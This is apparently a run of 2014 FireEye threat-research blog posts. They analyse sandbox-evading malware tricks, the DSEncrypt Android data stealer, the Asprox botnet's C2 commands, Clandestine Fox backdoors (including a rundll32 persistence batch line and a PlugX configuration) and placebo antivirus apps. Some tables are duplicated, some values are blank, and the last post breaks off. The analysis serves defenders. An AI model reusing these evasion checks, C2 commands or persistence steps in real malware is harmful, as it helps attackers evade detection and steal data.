RTF documents consist of normal text, control words, and groups. Microsoft’s RTF specification includes a shape-drawing function, which includes a series of properties using the following syntax:

{\sp {\sn propertyName } {\sv propertyValueInformation}}

In this code, \sp is the control word for the drawing property, \sn is the property name, and \sv contains information about the property value. The code snippet in Figure 1 exploits a vulnerability that occurs when using an invalid \sv value for the pFragments shape property.


Figure 1: Code exploiting vulnerability in the RTF pFragments property

A closer look at the exploit code reveals a series of paragraph marks (./par) that appears before the exploit code.


Figure 2: A series of \.par (paragraph marks) that appears before the exploit code

The repeated paragraph marks push the exploit code to the second page of the RTF document. So the malicious code does not execute unless the document scrolls down to bring the exploit code up into the active window—more likely a deliberate act by a human user than simulated movement in a virtual machine.

When the RTF is scrolled down to the second page, then only the exploit code triggers, and  as shown in Figure 3.0, it makes a call to  URLDownloadToFileA function from the shell code to download an executable file.


Figure 3: Exploit code

In a typical file-based sandbox, where any mouse activity is random or preprogrammed, the RTF document’s second page will never appear. So the malicious code never executes, and nothing seems amiss in the sandbox analysis.

Two clicks and you’re out

Another sandbox-evading attack we spotted in recent attacks waits for more than two mouse clicks before executing. The two-click condition aims to more accurately determine whether an actual person is operating the targeted machine—most people click mouse buttons many times throughout the day—or a one-time programmed click designed to counter evasion techniques.

Here’s how this technique works:

The malware invokes the function Get AsyncKeyState in a loop. The function checks whether any mouse buttons are clicked by looking for the parameter 0x01, 0x02, or 0x04. (The parameter 0x01 is the virtual key code for the mouse’s left button, 0x02 is the code for the right button, and 0x04 is the code of the middle button.)

The instruction “xor edi edi” sets the edi to 0. If any of the buttons is pressed, the code invokes the instruction “inc edi,” as shown in Figure 4. After that, the  instruction “cmp edi,2” checks whether the left, right or middle mouse buttons have been clicked more than two times. If so, code exits from the loop and gets to its real work. Otherwise, it stays under the radar, continuously checking for more mouse clicks.


Figure 4: Assembly code for evasion employing left, middle or right mouse clicks

Slow mouse, fast sandbox

Another recently discovered evasion technique involves checking for suspiciously fast mouse movement. To make sure an actual person is controlling the mouse or trackpad, malware code checks how quickly the cursor is moving. Superhuman speed is a telltale sign that the code is running in a sandbox.

This technique also makes use of the Windows function GetCursorPos, which retrieves the system’s cursor position. In the example malware code shown in Figure 5, GetCursorPos returns 614 for the x-axis value and 185 for the y-axis value.


Figure 5: Malware making first call to API GetCursorPos

After few instructions, malicious code again calls GetCursorPos to check whether the cursor position has changed. This time the function returns x= 1019 and y = 259, as shown in Figure 6.


Figure 6: Malware making second call to API GetCursorPos

A few instructions after the second GetCursorPos call, the malware code  invokes the instruction “SUB EDI, DWORD PTR DS:[410F15]”. As shown in the figure 5.0, the value in EDI is 0x103 (259 in decimal) and DS:[410F15] = 0xB9 (185 in decimal). The value 259 and 185 are the Y coordinates retrieved from the two GetCursorPos calls. If the difference between the two Y-coordinate measurements is not 0, then the malware terminates.


Figure 7:  Subtracting the Y coordinates to detect whether the cursor is moving too quickly to be human-controlled

In other words, if the cursor has moved between the two GetCursorPos calls (which are only a few instructions apart), then the malware concludes that the mouse movement is simulated. That’s too fast to be a real-world mouse or track pad in normal use, so the code must be running in a sandbox.

A growing challenge

Cybersecurity is a constant arms race. Simulating mouse movement and clicks is not enough to fool the most advanced sandbox-evading malware. Now malware authors are incorporating real-world behaviors into their evasion strategies.

Simulating these behaviors—the way actual people scroll documents, click the mouse button, and move the cursor— is a huge challenge for cybersecurity. Anticipating future evasion techniques might be even tougher. Expect malware authors to employ more novel techniques that look for that human touch.

In the paper “Hot Knives Through Butter: Evading File Based Sandboxes,” we've outlined 15 prior evasion techniques that have been used by advanced malware in real attacks to bypass file based sandboxes. We plan to continue updating the evasion series as we come across new techniques used by the latest threats and advanced malwares to bypass file based sandboxes.

What are you doing? – DSEncrypt Malware

Executive Summary

Have you ever downloaded and installed a large Android application that had very few actual UI elements or functionality? Recently, FireEye Labs mobile security researchers have discovered a new kind of mobile malware that encrypts an embedded Android application with an attachment in an asset folder – concealing all malicious activities within a seemingly benign application.

The malware app disguises itself as the Google Play store app, placing its similar icon close to the real Google Play store icon on the homescreen. Once installed, the hacker uses a dynamic DNS server with the Gmail SSL protocol to collect text messages, signature certificates and bank passwords from the Android devices.

The relationship between the main application, the attached application and the malicious classes are shown below.

[caption id="attachment_5675" align="alignnone" width="552"]Fig. 1. The relationship of the mask app and the embedded malware. Fig. 1. The relationship of the masked app and the embedded malware.[/caption]

The malware package name is com.sdwiurse and the app title is “google app stoy.” Android users can’t remove the app once the device is infected because the “uninstall” function is disabled and the app continues to run as services in the back-end. These services can be killed manually but will restart once the Android phone is restarted.

Owing to the unique nature of how the malware is packaged, as of June 13, 2014, the Virus Total score for this app is only 3 out of 51 anti-virus vendors. Because most vendors only use signature-based algorithms to detect malware, they fail to detect the malicious content concealed within apps that appear to be basic or run-of-the-mill.

[caption id="attachment_5700" align="alignnone" width="533"] Fig. 2. The Virus Total detection out of 51 AV vendors. The score was taken on 06/13/2014.[/caption]

The app we observed only has 711 lines of code but is over 1.7MB in size upon downloading. The single largest file, named “ds,” is embedded in the asset folder and is 597KB. After decryption and decompression however, the real dex package file expands up to 2.2MB with the full malware. The little amount of code in the superficial app is one of the evasion techniques used by the hackers to mask the malicious classes that swell the app’s size.

User Experience

After installation, a new icon of “googl app stoy” is shown on the Android homescreen. The icon is the same as “Google Play” to confuse users into clicking it. Once clicked, the app asks for administrator privileges of the device as shown in figure three.

[caption id="attachment_5681" align="alignnone" width="547"]Fig. 3. The newly installed icon on Android desktop and the activation page. Fig. 3. The newly installed icon on the Android desktop and the activation page.[/caption]

When we observe the app in action, the sole user interface for the app contains pops up saying “Program Error” and “It’s Deleted!” when translated to English from Korean. Next, the app terminates and a notification message appears reading “Unfortunately, google app stoy has stopped.” After this occurs, the app icon on the homescreen is removed, tricking the user into thinking it’s gone as shown in figure four.

[caption id="attachment_5683" align="alignnone" width="541"] Fig. 4. The misleading "uninstalling" page and Toast message.[/caption]

However, when opening “Setting->Apps,” we can still find the app in the “Downloaded” tab and “Running Apps” tab. Furthermore, in the “Downloaded” tab, the app cannot be stopped or uninstalled:

[caption id="attachment_5684" align="alignnone" width="547"] Fig. 5. The app can't be removed in the "Settings-Downloaded" page.[/caption]

In the “Running Apps” tab, there are five services running that were started by the malicious app:

1.    uploadContentService

2.    UninstallerService

3.    SoftService

4.    uploadPhone

5.    autoRunService

[caption id="attachment_5685" align="alignnone" width="548"] Fig. 6. The 5 background services started by the app. You won't discover them unless digging into the long list of "Running App" tab.[/caption]


The file is encrypted using the javax.crypto package of Java Cryptographic Extension (JCE) framework as shown below.

[caption id="attachment_5686" align="alignnone" width="422"]Fig. 7. Decipher code. Fig. 7. Decipher code.[/caption]

The cryptographic algorithm is based on the Data Encryption Standard (DES). The key string is “gjaoun” as shown in the code below. After the file is decrypted, it's loaded as the dex class:

[caption id="attachment_5688" align="alignnone" width="488"]Fig. 8. The embedded and encrypted dex file.  Fig. 8. The code of decryption and class loading for the embedded file.[/caption]

All the malicious activities and services happen in the loaded dex file.

Malicious Methods

In the source code of the malicious dex package, “class.dex” is decompressed from the decrypted file “” Analyzing this code, we found there are three ways to steal private information from the infected Android device. We will first introduce how the malware works and then analyze the network traffic as evidence of the malicious behaviors.

1. SMS Message Theft

[caption id="attachment_5689" align="alignnone" width="542"]Fig. 9. The code to steal personal SMS. Fig. 9. The code to steal personal SMS.[/caption]

In the code, ak40.txt is a file in /storage/sdcard0/temp/ folder containing a string. When the content equals to “1,” the SMS message is sent to an email address. The email address and password are stored among other files in /storage/sdcard0/temp/. The hacker is smart enough to use the Gmail SSL protocol to evade the signature detection in network traffic by most AV vendors.

2. Signature Certificate and Key Theft

[caption id="attachment_5691" align="alignnone" width="546"]Fig. 11. The code to steal signature certificate and keys. Fig. 11. The code to steal signature certificate and keys.[/caption]

The variable v1 is the phone number of the compromised Android phone, while the Url.getSDPath() is the “temp” folder in the mounted storage:

[caption id="attachment_5692" align="alignnone" width="533"]Fig. 12. The location of the temporary folder that the malware app uses to collect signature certificate and keys. Fig. 12. The location of the temporary folder that the malware app uses to collect signature certificate and keys.[/caption]

The same zip file is named as “” to upload to a server and also named as “{PHONE_NUMBER}” to send through Gmail as an attachment.

3. Bank Account Password Theft

[caption id="attachment_5693" align="alignnone" width="545"]Fig. 13. The code to steal personal bank account and password. Fig. 13. The code to steal personal bank account and password.[/caption]

Network Traffic

We have intercepted the network traffic of the malicious app in the FireEye Mobile Threat Prevention (MTP) Platform to verify the malicious activities we found in the code above.

1. SMS Message Transmission

Because the destination, including the email address and the password is stored in a cached file on the phone, we have replaced it with a testing email account and redirected a testing SMS to the newly created email address to simulate the scenario of receiving SMS in the MTP platform. Here is an example of the SMS messages that we have intercepted from the testing email account:

[caption id="attachment_5694" align="alignnone" width="541"]Fig. 14. The testing email and SMS we intercepted in the FireEye MTP platform. Fig. 14. The testing email and SMS we intercepted in the FireEye MTP platform.[/caption]

The time stamp shows the email address received the content (at 9:39 PM) of the victim’s incoming SMS (at 9:38 PM) within 1 minute.

2. Signature Certificate and Key Transmission

We captured the PCap information in the FireEye MTP platform. The PCap shows that the “” is uploaded to domain “”.

[caption id="attachment_5695" align="alignnone" width="557"]Fig. 15. The PCap of the signature certificate and keys. Fig. 15. The PCap of the signature certificate and keys.[/caption]

The same file is renamed to {PHONE_NUMBER} and sent as Gmail attachment using SSL configuration. The picture below shows the signature certificate file and signature primary key after unzipping from the attachment that the malware app leaks to the SMTP server.

[caption id="attachment_5696" align="alignnone" width="554"]Fig. 16. The content of the signature certificate and keys. Fig. 16. The content of the signature certificate and keys.[/caption]

3. Bank Account Password Transmission

We have found email evidence containing victims’ bank accounts and passwords and worked with Google’s Gmail team to take down hacker’s email accounts.

A Not-So Civic Duty: Asprox Botnet Campaign Spreads Court Dates and Malware

Executive Summary

FireEye Labs has been tracking a recent spike in malicious email detections that we attribute to a campaign that began in 2013. While malicious email campaigns are nothing new, this one is significant in that we are observing mass-targeting attackers adopting the malware evasion methods pioneered by the stealthier APT attackers. And this is certainly a high-volume business, with anywhere from a few hundred to ten thousand malicious emails sent daily – usually distributing between 50 and 500,000 emails per outbreak.

Through the FireEye Dynamic Threat Intelligence (DTI) cloud, FireEye Labs discovered that each and every major spike in email blasts brought a change in the attributes of their attack. These changes have made it difficult for anti-virus, IPS, firewalls and file-based sandboxes to keep up with the malware and effectively protect endpoints from infection. Worse, if past is prologue, we can expect other malicious, mass-targeting email operators to adopt this approach to bypass traditional defenses.

This blog will cover the trends of the campaign, as well as provide a short technical analysis of the payload.

Campaign Details


Figure 1: Attack Architecture

The campaign first appeared in late December of 2013 and has since been seen in fairly cyclical patterns each month. It appears that the threat actors behind this campaign are fairly responsive to published blogs and reports surrounding their malware techniques, tweaking their malware accordingly to continuously try and evade detection with success.

In late 2013, malware labeled as Kuluoz, the specific spam component of the Asprox botnet, was discovered to be the main payload of what would become the first malicious email campaign. Since then, the threat actors have continuously tweaked the malware by changing its hardcoded strings, remote access commands, and encryption keys.

Previously, Asprox malicious email campaigns targeted various industries in multiple countries and included a URL link in the body. The current version of Asprox includes a simple zipped email attachment that contains the malicious payload “exe.” Figure 2 below represents a sample message while Figure 3 is an example of the various court-related email headers used in the campaign.


Figure 2 Email Sample


Figure 3 Email Headers

Some of the recurring campaign that Asporox used includes themes focused around airline tickets, postal services and license keys. In recent months however, the court notice and court request-themed emails appear to be the most successful phishing scheme theme for the campaign.

The following list contains examples of email subject variations, specifically for the court notice theme:

  • Urgent court notice
  • Notice to Appear in Court
  • Notice of appearance in court
  • Warrant to appear
  • Pretrial notice
  • Court hearing notice
  • Hearing of your case
  • Mandatory court appearance

The campaign appeared to increase in volume during the month of May. Figure 4 shows the increase in activity of Asprox compared to other crimewares towards the end of May specifically. Figure 5 highlights the regular monthly pattern of overall malicious emails. In comparison, Figure 6 is a compilation of all the hits from our analytics.


Figure 4 Worldwide Crimeware Activity


Figure 5 Overall Asprox Botnet tracking


Figure 6 Asprox Botnet Activity Unique Samples

These malicious email campaign spikes revealed that FireEye appliances, with the support of DTI cloud, were able to provide a full picture of the campaign (blue), while only a fraction of the emailed malware samples could be detected by various Anti-Virus vendors (yellow).


Figure 7 FireEye Detection vs. Anti-Virus Detection

By the end of May, we observed a big spike on the unique binaries associated with this malicious activity. Compared to the previous days where malware authors used just 10-40 unique MD5s or less per day, we saw about 6400 unique MD5s sent out on May 29th. That is a 16,000% increase in unique MD5s over the usual malicious email campaign we’d observed. Compared to other recent email campaigns, Asprox uses a volume of unique samples for its campaign.


Figure 8 Asprox Campaign Unique Sample Tracking


Figure 9 Geographical Distribution of the Campaign


Figure 10 Distribution of Industries Affected

Brief Technical Analysis


Figure 11 Attack Architecture


The infiltration phase consists of the victim receiving a phishing email with a zipped attachment containing the malware payload disguised as an Office document. Figure 11 is an example of one of the more recent phishing attempts.


Figure 12 Malware Payload Icon


Once the victim executes the malicious payload, it begins to start an svchost.exe process and then injects its code into the newly created process. Once loaded into memory, the injected code is then unpacked as a DLL. Notice that Asprox uses a hardcoded mutex that can be found in its strings.

  1. Typical Mutex Generation
    1. "2GVWNQJz1"
  2. Create svchost.exe process
  3. Code injection into svchost.exe


Once the dll is running in memory it then creates a copy of itself in the following location:


Example filename:


It’s important to note that the process will first check itself in the startup registry key, so a compromised endpoint will have the following registry populated with the executable:



The malware uses various encryption techniques to communicate with the command and control (C2) nodes. The communication uses an RSA (i.e. PROV_RSA_FULL) encrypted SSL session using the Microsoft Base Cryptographic Provider while the payloads themselves are RC4 encrypted. Each sample uses a default hardcoded public key shown below.

Default Public Key






-----END PUBLIC KEY-----

First Communication Packet

Bot ID RC4 Encrypted URL

POST /5DBA62A2529A51B506D197253469FA745E7634B4FC


Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: <host useragent>

Host: <host ip>:443

Content-Length: 319

Cache-Control: no-cache


C2 Commands

In comparison to the campaign at the end of 2013, the current campaign uses one of the newer versions of the Asprox family where threat actors added the command “ear.”

if ( wcsicmp(Str1, L"idl") )


if ( wcsicmp(Str1, L"run") )


if ( wcsicmp(Str1, L"rem") )


if ( wcsicmp(Str1, L"ear")


if ( wcsicmp(Str1, L"rdl") )


if ( wcsicmp(Str1, L"red") )


if ( !wcsicmp(Str1, L"upd") )

C2 commands Description
idl idl This commands idles the process to wait for commands This commands idles the process to wait for commands
run run Download from a partner site and execute from a specified path Download from a partner site and execute from a specified path
rem rem Remove itself Remove itself
ear ear Download another executable and create autorun entry Download another executable and create autorun entry
rdl rdl Download, inject into svchost, and run Download, inject into svchost, and run
upd upd Download and update Download and update
red red Modify the registry Modify the registry

C2 Campaign Characteristics


For the two major malicious email campaign spikes in April and May of 2014, separate sets of C2 nodes were used for each major spike.

April May-June


The data reveals that each of the Asprox botnet’s malicious email campaigns changes its method of luring victims and C2 domains, as well as the technical details on monthly intervals. And, with each new improvement, it becomes more difficult for traditional security methods to detect certain types of malware.


Nart Villeneuve, Jessa dela Torre, and David Sancho. Asprox Reborn. Trend Micro. 2013.

Mergers and Acquisitions: When Two Companies and APT Groups Come Together

With Apple’s purchase of Beats, Pfizer’s failed bids for AstraZeneca, and financial experts pointing to a rally in the M&A market, the last month was a busy one for mergers and acquisitions. Of course, when we first see headlines of a high profile company’s plans for a merger or acquisition, we rush to think of the strategic and industry implications of such a deal. But underneath the “what ifs” and “visions for the future,” is a darker side of M&A that doesn’t make the headlines: the routineness with which companies are breached and crucial data is stolen when two high-profile organizations look to join together.

Over the last few years, concerns over economic espionage have led to greater scrutiny of mergers and acquisitions involving foreign companies – particularly in industries with sensitive technologies and operations that could pose broader economic and security threats. However, entering into a merger or acquisition with a foreign company is not the only way nation-states conduct economic espionage via cyber means, nor are nation-states the only perpetrators of intellectual property theft.

From our experience responding to these breaches, we’ve seen targeted threat actors actively pursuing companies involved in mergers and acquisitions in two ways:

  • Breaching one of the merging or acquired company’s subsidiaries’ and/or partners’ networks to ultimately gain access to the targeted company’s environment and information
  • Compromising and stealing information from a company involved in business talks with a foreign enterprise in order to provide the other side with an insider advantage in the negotiations

From One Friend to Another: Taking Advantage of Trusted Relationships Between Companies

Some threat groups compromise an organization’s environment and then move laterally over a connected network to a partner or subsidiary, while others rely on social engineering tactics, such as the use of phishing emails that appear to be from employees at the partner company. We have seen China-based threat groups previously compromise targets by taking advantage of trusted relationships and bridged networks between companies. Regardless of their method of entry, these actors are often in search of the same thing: intellectual property and proprietary information that can provide their own constituents with a business advantage, whether through adopting a rival’s technology and products, securing advantageous prices, or any other tactic that could give them a leg up.

We investigated one incident in which two threat groups compromised a company shortly after it acquired a subsidiary. The threat actors used their access to the initial company’s network to move laterally to the subsidiary, which had recently developed a proprietary process for a significant new healthcare product. Once inside the subsidiary’s network, the threat groups stole data that included details on the product’s test results. We believe the threat groups sought to give that data to Chinese state-owned companies in that industry for fast-tracking the development of their own version of the groundbreaking product.

Cheating the System: Insider Advantages in Negotiations

We have also seen threat groups compromising organizations involved in merger or acquisition talks with Chinese entities, likely in an effort to steal data that could give negotiators and decision makers valuable insider information with which to manipulate the outcome of the proposed transaction. Unlike other types of economic espionage operations, the threat groups in this type of scenario are generally not in search of a company’s intellectual property. Instead, these actors look for data such as executive emails, negotiation terms, and business plans and information; all of which could benefit the negotiators by giving them insight into the victim company’s financial situation and negotiation strategy.

During one investigation, we found that a China-based threat group had compromised a company that was in the process of acquiring a Chinese subsidiary – a move that would have significantly increased the victim company’s manufacturing and retail capacity in the Chinese market. The threat actors accessed the email accounts of multiple employees involved in the negotiations in what was likely a search for information pertaining to the proceedings. We believe that the threat group then used the stolen information to inform Chinese decision makers involved in the acquisition process, as the Chinese government terminated the talks shortly after the data theft occurred.

What can we expect?

Companies involved in mergers and acquisitions need to be aware of the risks they face from threat actors intent on conducting economic espionage. Entering into a merger or acquisition with an organization that has unidentified intrusions and unaudited networks places a company at risk of compromise from threat actors who may be waiting to move laterally to the newly integrated target.

Similarly, companies, and the law firms representing them, involved in negotiations with Chinese enterprises face risks from threat groups seeking to provide the Chinese entity with an advantage in negotiations. Compromise and economic espionage can have profound impacts on a company’s finances and reputation at any time, but particularly when they are risking hundreds of millions to billions of dollars on M&A.

In many cases as well, there are broader issues of national security, so it’s imperative that companies seek to recognize and mitigate these risks as part of their M&A processes moving forward. Even governments sometimes attempt to mitigate these risks by conducting national security reviews and occasionally rejecting bids based on their findings.[i] Threat actors from many countries engage in economic espionage, making for a wide and varied threat landscape that cannot be handled by the government alone. For examples of just how diverse and crowded a space the targeted threat landscape is becoming, see our recent blog posts on Molerats, Saffron Rose, and Russia and Ukraine.

[i] “The Committee on Foreign Investment in the United States (CFIUS).” U.S. Department of the Treasury. 20 Dec. 2012. Web. 28 May 2014.

Clandestine Fox, Part Deux

We reported at the end of April and the beginning of May on an APT threat group leveraging a zero-day vulnerability in Internet Explorer via phishing email attacks. While Microsoft quickly released a patch to help close the door on future compromises, we have now observed the threat actors behind “Operation Clandestine Fox” shifting their point of attack and using a new vector to target their victims: social networking.

An employee of a company in the energy sector recently received an email with a RAR archive email attachment from a candidate. The attachment, ostensibly containing a resume and sample software program the applicant had written, was from someone we’ll call “Emily” who had previously contacted the actual employee via a popular social network.

FireEye acquired a copy of the suspicious email – shown below in Figure 1 – and attachment from the targeted employee and investigated. The targeted employee confirmed that “Emily” had contacted him via the popular social network, and that, after three weeks of back and forth messaging “she” sent her “resume” to his personal email address.  

[caption id="attachment_5658" align="aligncenter" width="441"]clandestine2 Figure 1: Sample email illustrating how “Emily” attacks a victim employee[/caption]

Working our way backwards, we reviewed “Emily’s” social network profile and noticed a few strange aspects that raised some red flags. For example, “her” list of contacts had a number of people from the victim’s same employer, as well as employees from other energy companies; “she” also did not seem to have many other “friends” that fit “her” alleged persona. “Her” education history also contained some fake entries.

Further research and discussions with the targeted company revealed that “Emily,” posing as a prospective employee, had also contacted other personnel at the same company. She had asked a variety of probing questions, including inquiring who the IT Manager was and what versions of software they ran – all information that would be very useful for an attacker looking to craft an attack.

It’s worth emphasizing that in the instances above, the attackers used a combination of direct contact via social networks as well as contact via email, to communicate with their intended targets and send malicious attachments. In addition, in almost all cases, the attackers used the target’s personal email address, rather than his or her work address. This could be by design, with a view toward circumventing the more comprehensive email security technologies that most companies have deployed, or also due to many people having their social network accounts linked to their personal rather than work email addresses.

Details - Email Attachment #1

The resume.rar archive contained three files: a weaponized version of the open-source TTCalc application (a mathematical big number calculator), a benign text copy of the TTCalc readme file, and a benign PDF of Emily’s resume. The resume was a nearly identical copy of a sample resume available elsewhere on the Internet.  The file details are below.

Filename MD5 Hash
resume.rar resume.rar 8b42a80b2df48245e45f99c1bdc2ce51 8b42a80b2df48245e45f99c1bdc2ce51
readme.txt readme.txt 8c6dba68a014f5437c36583bbce0b7a4 8c6dba68a014f5437c36583bbce0b7a4
resume.pdf resume.pdf ee2328b76c54dc356d864c8e9d05c954 ee2328b76c54dc356d864c8e9d05c954
ttcalc.exe ttcalc.exe e6459971f63612c43321ffb4849339a2 e6459971f63612c43321ffb4849339a2

Upon execution, ttcalc.exe drops the two files listed below, and also launches a legitimate copy of TTCalc v0.8.6 as a decoy:

%USERPROFILE%/Application Data/mt.dat

%USERPROFILE%/Start Menu/Programs/Startup/vc.bat

The file mt.dat is the actual malware executable, which we detect as Backdoor.APT.CookieCutter. (Variants of this family of backdoor are also referred to as “Pirpi” in the security industry). In this case, the malware was configured to use the following remote servers for command and control:

    • swe[.]karasoyemlak[.]com
    • inform[.]bedircati[.]com (Note: This domain was also used during Operation Clandestine Fox)

Metadata for mt.dat:

Description MD5 Hash
md5 md5 1a4b710621ef2e69b1f7790ae9b7a288 1a4b710621ef2e69b1f7790ae9b7a288
.text .text 917c92e8662faf96fffb8ffe7b7c80fb 917c92e8662faf96fffb8ffe7b7c80fb
.rdata .rdata 975b458cb80395fa32c9dda759cb3f7b 975b458cb80395fa32c9dda759cb3f7b
.data .data 3ed34de8609cd274e49bbd795f21acc4 3ed34de8609cd274e49bbd795f21acc4
.rsrc .rsrc b1a55ec420dd6d24ff9e762c7b753868 b1a55ec420dd6d24ff9e762c7b753868
.reloc .reloc afd753a42036000ad476dcd81b56b754 afd753a42036000ad476dcd81b56b754
Import Hash Import Hash fad20abf8aa4eda0802504d806280dd7 fad20abf8aa4eda0802504d806280dd7
Compile date Compile date 2014-05-27 15:48:13 2014-05-27 15:48:13

Contents of vc.bat:

  @echo offcmd.exe /C start rundll32.exe "C:\Documents and Settings\admin\Application Data\mt.dat" UpdvaMt

Details - Email Attachment #2

Through additional research, we were able to obtain another RAR archive email attachment sent by the same attackers to an employee of another company. Note that while there are a lot of similarities, such as the fake resume and inclusion of TTCalc, there is one major difference, which is the delivery of a completely different malware backdoor. The attachment name this time was “my resume and projects.rar,” but this time it was protected with the password “TTcalc.”

Filename MD5 Hash
my resume and projects.rar my resume and projects.rar ab621059de2d1c92c3e7514e4b51751a ab621059de2d1c92c3e7514e4b51751a
SETUP.exe SETUP.exe 510b77a4b075f09202209f989582dbea 510b77a4b075f09202209f989582dbea
my resume.pdf my resume.pdf d1b1abfcc2d547e1ea1a4bb82294b9a3 d1b1abfcc2d547e1ea1a4bb82294b9a3

SETUP.exe is a self-extracting RAR, which opens the WinRAR window when executed, prompting the user for the location to extract the files. It writes them to a TTCalc folder and tries to launch ttcalcBAK.exe (the malware dropper), but the path is incorrect so it fails with an error message. All of the other files are benign and related to the legitimate TTCalc application.

Filename MD5 Hash
CHANGELOG CHANGELOG 4692337bf7584f6bda464b9a76d268c1 4692337bf7584f6bda464b9a76d268c1
COPYRIGHT COPYRIGHT 7cae5757f3ba9fef0a22ca0d56188439 7cae5757f3ba9fef0a22ca0d56188439
README README 1a7ba923c6aa39cc9cb289a17599fce0 1a7ba923c6aa39cc9cb289a17599fce0
ttcalc.chm ttcalc.chm f86db1905b3f4447eb5728859f9057b5 f86db1905b3f4447eb5728859f9057b5
ttcalc.exe ttcalc.exe 37c6d1d3054e554e13d40ea42458ebed 37c6d1d3054e554e13d40ea42458ebed
ttcalcBAK.exe ttcalcBAK.exe 3e7430a09a44c0d1000f76c3adc6f4fa 3e7430a09a44c0d1000f76c3adc6f4fa

The file ttcalcBAK.exe is also a self-extracting Rar which drops and launches chrome_frame_helper, which is a Backdoor.APT.Kaba (aka PlugX/Sogu) backdoor using a legitimate Chrome executable to load the malicious DLL via side-loading. Although this backdoor is used by multiple threat groups and is quite commonly seen these days, this is the first time we've observed this particular threat group using this family of malware. The malware was configured to communicate to the command and control domain www[.]walterclean[.]com ( at the time of discovery) using the binary TCP protocol only. The file details are below, followed by the malware configuration.

Filename MD5 Hash
chrome_frame_helper.dll chrome_frame_helper.dll 98eb249e4ddc4897b8be6fe838051af7 98eb249e4ddc4897b8be6fe838051af7
chrome_frame_helper.dll.hlp chrome_frame_helper.dll.hlp 1b57a7fad852b1d686c72e96f7837b44 1b57a7fad852b1d686c72e96f7837b44
chrome_frame_helper.exe chrome_frame_helper.exe ffb84b8561e49a8db60e0001f630831f ffb84b8561e49a8db60e0001f630831f


Metadata MD5 Hash
chrome_frame_helper.dll chrome_frame_helper.dll 98eb249e4ddc4897b8be6fe838051af7 98eb249e4ddc4897b8be6fe838051af7
.text .text dfb4025352a80c2d81b84b37ef00bcd0 dfb4025352a80c2d81b84b37ef00bcd0
.rdata .rdata 4457e89f4aec692d8507378694e0a3ba 4457e89f4aec692d8507378694e0a3ba
.data .data 48de562acb62b469480b8e29821f33b8 48de562acb62b469480b8e29821f33b8
.reloc .reloc 7a7eed9f2d1807f55a9308e21d81cccd 7a7eed9f2d1807f55a9308e21d81cccd
Import hash Import hash 6817b29e9832d8fd85dcbe4af176efb6 6817b29e9832d8fd85dcbe4af176efb6
Compile date Compile date 2014-03-22 11:08:34 2014-03-22 11:08:34

Backdoor.APT.Kaba Malware Configuration:

PlugX Config (0x150c bytes):

Flags: False True False False False False True True True True False

Timer 1: 60 secs

Timer 2: 60 secs

C&C Address: www[.]walterclean[.]com:443 (TCP)

Install Dir: %ALLUSERSPROFILE%\chrome_frame_helper

Service Name: chrome_frame_helper

Service Disp: chrome_frame_helper

Service Desc: Windows chrome_frame_helper Services

Online Pass: 1234

Memo: 1234

Open Source Intel

The domain walterclean[.]com shares registration details with securitywap[.]com:

The following domains are registered to QQ360LEE@126.COM

Domain: walterclean[.]com

Create Date: 2014-03-26 00:00:00

Registrar: ENOM, INC.

Domain: securitywap[.]com

Create Date: 2014-03-26 00:00:00

Registrar: ENOM, INC.


In short, we attributed these attacks to the same threat actor responsible for “Operation Clandestine Fox,” based on the following linkages:

  • The first-stage malware (mt.dat) is a slightly updated version of the Backdoor.APT.CookieCutter malware dropped during Operation Clandestine Fox
  • Based on our intel, Backdoor.APT.CookieCutter has been used exclusively by this particular threat group
  • Finally, the command and control domain inform[.]bedircati[.]com seen in this activity was also used during the Clandestine Fox campaign

Another evolutionary step for this threat group is that they have diversified their tool usage with the use of the Kaba/PlugX/Sogu malware – something we have never seen them do before.

As we have noted in other blog posts, APT threat actors take advantage of every possible vector to try to gain a foothold in the organizations they target. Social networks are increasingly used for both personal and business reasons, and are one more potential threat vector that both end-users and network defenders need to think about.

Unfortunately, it is very common for users to let their guard down when using social networks or personal email, since they don’t always treat these services with the same level of risk as their work email.  As more companies allow their employees to telecommute, or even allow them to access company networks and/or resources using their personal computers, these attacks targeting their personal email addresses pose significant risk to the enterprise.


 The author would like to acknowledge the following colleagues for their contributions to this report: Josh Dennis, Mike Oppenheim, Ned Moran, and Joshua Homan.

Preying on Insecurity: Placebo Applications With No Functionality on Google Play and

FireEye mobile security researchers recently uncovered, and notified Google and Amazon to take down, a series of anti-virus and security configuration apps that were nothing more than scams. Written easily by a thieving developer with just a few hundred lines of code then covered with a facade of images and progress bars, the seemingly useful apps for Android’s operating environment charge for installation and upgrade but do nothing. In other words, placebo applications. Fortunately all the applications have been removed from the Google Play store due to our discovery.

Up to 50,000 downloads in some cases, these fake apps highlight how cybercriminals are exploiting the security concerns consumers have about the Android platform. In this case, we found five (!) fake antivirus apps that do nothing other than take a security-conscious user’s money, leaves them unprotected from mobile threats, and earns a criminal thousands of dollars for little work.

Uploaded by a developer named Mina Adib, the paid versions of the apps were available for Google Play customers outside the US and UK, while users in the UK and US could choose the free versions with in-app upgrade options. Also available in third party markets such as[1] and[2], the fraudulent apps ranged in price from free to $3.99. The applications included:

  1. Anti-Hacker PLUS (com.minaadib.antihackerplus) Price $3.99
  2. JU AntiVirus Pro (com.minaadib.juantiviruspro) Price $2.99
  3. Anti-Hacker (com.minaadib.antihacker) Free
  4. Me Web Secure (com.minaadib.mewebsecurefree) Free
  5. Me Web Secure Pro (com.minaadib.mewebsecure) Price $1.99
  6. Taking full advantage of the legacy, signature-based approach mobile antivirus apps have adopted, that makes it hard for a user to tell if it really is working, total charges for these “security” apps ran into the thousands of US dollars in the Google Play store alone. This old security model puts users relying on such applications at risk, either because it incites them to download apps that simply don’t have functionality – as we see in this case – or they don’t provide adequate protection against today’s threats. Ultimately, users simply cannot tell when they are protected.

    1. Anti-Hacker (com.minaadib.antihacker) Free

    [caption id="attachment_5567" align="aligncenter" width="600"]Free Version of Anti-Hacker app in Google Play store. Fig. 1. Free Version of Anti-Hacker app in Google Play store.[/caption]

    This application claims to protect mobile devices from hackers. But, as with all of these apps, it’s a scam not capable of scanning the phone at all. Although there is a “Scan Now” button in the middle of the layout, it only shows a superficial progress bar when the user presses the button, which, after a few seconds of running, a toast message of "Your Android is clean" is shown.

    The picture below shows the main interface of the application.

    [caption id="attachment_5570" align="aligncenter" width="302"]Fig. 2. The UI of the Anti-Hacker app. Fig. 2. The UI of the Anti-Hacker app.[/caption]

    The following code is executed when the user clicks the “Scan Now” button.

    As shown in the code, nothing happens when the button is clicked. Then the toast message of “You Android is clean” is shown as in the onDismiss() method.

